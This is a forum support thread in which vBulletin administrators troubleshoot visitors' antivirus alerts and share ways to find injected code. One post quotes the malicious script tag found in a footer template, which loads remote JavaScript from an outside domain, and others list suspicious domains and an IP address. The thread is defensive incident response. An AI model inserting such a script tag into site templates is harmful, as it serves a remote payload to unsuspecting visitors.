Forums triggering virus alerts

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Wardsweb
    Member
    • Aug 2004
    • 46
    • 3.7.x

    Forums triggering virus alerts

    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I can not find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?
  • adnoid
    New Member
    • Mar 2008
    • 10
    • 3.7.x

    #2
    Originally posted by Wardsweb
    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I can not find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?
    Boy, I've been getting this as well. Of course, everyone assumes it's our board that's doing it, but we're on a dedicated server and I've just checked it again.

    Posted this on our site, any thoughts from anyone would be welcome.

    Comment

    • Trevor Hannant
      vBulletin Support
      • Aug 2002
      • 24325
      • 5.7.X

      #3
      Can you try re-downloading the ZIP file from the Members Area and re-upload all files (except install/install.php and includes/config.php.new) making sure you overwrite all files currently on your server.

      Does this resolve the problem?
      Vote for:

      - Admin Settable Paid Subscription Reminder Timeframe (vB6)
      - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

      Comment

      • Wardsweb
        Member
        • Aug 2004
        • 46
        • 3.7.x

        #4
        While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.

        Comment

        • Simon Lloyd
          Senior Member
          • Apr 2008
          • 610
          • 3.7.x

          #5
          Originally posted by Wardsweb
          While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.
          You shouldn't have a problem with following Trevors suggestion unless you have modified vbulletin core files, if you haven't then nothing that you have done to your forum mods, templates, css or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else thats stored.

          I know because i have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and i mean evereything!
          Kind regards,
          Simon
          Microsoft Office Discussion

          Comment

          • syrus.xl
            Senior Member
            • Jun 2005
            • 546

            #6
            Hi,

            Sounds like you have an iframe sql injection. It can be in your templates, but not always - it varies.

            Checking your source code may or may not find it either. Download Developer Tools for Firefox - then check Generated Source Code, this will show up any hidden source code that you normally will not see. Once you find which template it is, just hit Save on that template and it will remove and injected code.

            Re-uploading all vBulletin core files will not always correct this problem if you the person has hidden 'backdoor' files in your vBulletin, in which case check your Suspect Files for Base64 coding, or additional encoded javascript files, all of which will 'kill' your forum eventually.

            Leaving 'backdoor' files in vBulletin or any script, will not stop a malicious attack even if you are running the latest vBulletin with all patches. Blocking IP's in your .htaccess file will just cause your forum to respond slower after awhile, since each I.P will be checked before allowing access.

            Regards,

            Comment

            • creativepart
              Senior Member
              • Jan 2006
              • 293
              • 3.8.x

              #7
              A lot of forums suddenly started having issues yesterday. Our users suddenly have to hit their "back" button multiple times to move back one page. Seems that MS IE users are complaining exclusively. But I'm not positive. My users have pointed out issues with some file called www.alltagcloud.info/icons/index.html I network with a couple of dozen other VB forum admins, they started seeing this yesterday as well. They are thinking it's some Adsense ad possibly.
              Last edited by creativepart; Sun 18 Dec '11, 3:10pm.

              Comment

              • creativepart
                Senior Member
                • Jan 2006
                • 293
                • 3.8.x

                #8
                We found it on our system. Look for this code:
                Code:
                <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                We found it in the Footer -- right after the
                Code:
                <form action="$vboptions[forumhome].php" method="get">

                Comment

                • Wardsweb
                  Member
                  • Aug 2004
                  • 46
                  • 3.7.x

                  #9
                  Originally posted by creativepart
                  We found it on our system. Look for this code:
                  Code:
                  <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                  We found it in the Footer -- right after the
                  Code:
                  <form action="$vboptions[forumhome].php" method="get">
                  Thanks - I looked but not found.

                  Comment

                  • Wardsweb
                    Member
                    • Aug 2004
                    • 46
                    • 3.7.x

                    #10
                    Many members have referenced the Toolkit and this IP address 178.17.163.189. The domain name may change but the IP is the same. Even with this IP set 178.17.163. in the .htaccess, some are still getting hit.

                    Even the hosting company is trying to find where this is being launched to no avail.
                    Attached Files

                    Comment

                    • MarkTTU
                      New Member
                      • Dec 2011
                      • 9
                      • 3.8.x

                      #11
                      We have a few members grumbling about this as well, but thus far I haven't been able to find a thing. I've even tried accessing the site from inside a VM with virgin XP and 7 installs and no protection of any kind hoping to get some kind of infection, but haven't managed to infect myself.

                      I did look and couldn't find any reference to www.pageviewapi.com anywhere.
                      Host for ShopFloorTalk.com

                      Comment

                      • creativepart
                        Senior Member
                        • Jan 2006
                        • 293
                        • 3.8.x

                        #12
                        When we had this issue I downloaded and installed Fiddler2 on my desktop computer. This little free program runs in a separate window and lists every file, function and script called while your page loads. I couldn't "see" any problems on my site until I loaded this and watched a page load. That's when I started seeing some script at alltagcloud.info loading with each page load. And, since Fiddler2 shows everything loading in order I could see that the script was being called near or in the footer which narrowed down the search. We were surprised to find the script was actually named something different than alltagcloud.info and I'd guess they have multiple versions of this with different names. Initially something named "pageviewapi.com" sounding fairly normal for the standard VB footer code.

                        You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.

                        Comment

                        • Wardsweb
                          Member
                          • Aug 2004
                          • 46
                          • 3.7.x

                          #13
                          Originally posted by Simon Lloyd
                          You shouldn't have a problem with following Trevors suggestion unless you have modified vbulletin core files, if you haven't then nothing that you have done to your forum mods, templates, css or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else thats stored.

                          I know because i have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and i mean evereything!
                          We are on a dedicated server, so I had the server company replace all the templates from a backup. We backup the site daily and used one from 30 days ago to retreive the files. Still there are a couple posts after the reinstall of people being hit. Whatever it is, it is very nasty taking over their computers to the point of having to reformat or reinstall from a cloned drive or backup.

                          Comment

                          • MarkTTU
                            New Member
                            • Dec 2011
                            • 9
                            • 3.8.x

                            #14
                            Originally posted by creativepart
                            You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.
                            Been playing around with the forum with Fiddler2 and have yet to find anything. Could it be that these guys got infected somewhere else and it gets triggered when they visit a VB site?
                            Host for ShopFloorTalk.com

                            Comment

                            • 45Wheelgun
                              Member
                              • May 2009
                              • 41
                              • 3.8.x

                              #15
                              Our forum has been dealing with this since December 11. We have had 25-30 people over 16 days report issues. We are a mid-sized board with 20,000+ uniques per day. Out of 20k uniques per day, 1 or 2 of them report either getting a virus, or having their virus software notify them that a virus was blocked. That is .005% of our unique visitors reporting issues. Of course all of them claim it only happens when they visit our website.

                              We run on dedicated servers which have been check, rechecked and then checked again. We have compared our files with the maintenance tools as well as our templates. I have had a group of people running fiddler2 for days and none of us has seen anything.

                              I would love to figure this one out. I would like to know why it only bothers a small fraction of my users.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...